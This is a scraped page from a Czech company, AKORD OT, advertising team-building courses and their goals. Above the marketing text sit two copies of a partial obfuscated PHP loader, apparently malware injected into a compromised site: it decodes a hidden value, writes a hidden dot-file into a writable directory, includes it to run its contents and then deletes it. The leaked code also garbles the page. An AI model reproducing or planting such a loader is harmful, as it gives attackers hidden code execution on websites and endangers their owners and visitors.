100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Teambuilding - AKORD OT

Teambuilding

Teambuilding - nastartování nových týmů

„Pošlete nám skupinu pracovníků, vrátí se vám fungující tým," tak by se dal s jistou nadsázkou charakterizovat kurz určený k budování nových pracovních týmů.

Dílčími cíli teambuildingových programů bývá:

  • bližší vzájemné poznání členů pracovních skupin
  • nastavení pravidel spolupráce
  • budování vzájemné důvěry
  • podpora kohezivních procesů ve skupině
  • praktický trénink týmové spolupráce

Hlavním zdrojem rozvíjející zkušenosti jsou zážitky získávané při řešení zajímavých, méně obvyklých, nezřídka dobrodružných týmových úkolů.

Teambuildingové kurzy mají promyšlenou dramaturgii a pracují se skupinovými rozbory.

Náročnost teambuildingů lze volit podle potřeb a možností konkrétních účastnických skupin.

Třídenní teambuilding s AKORDem posune spolupráci týmu na úroveň, k jaké by v běžném firemním prostředí dospěl za půl roku. 

Comments are closed.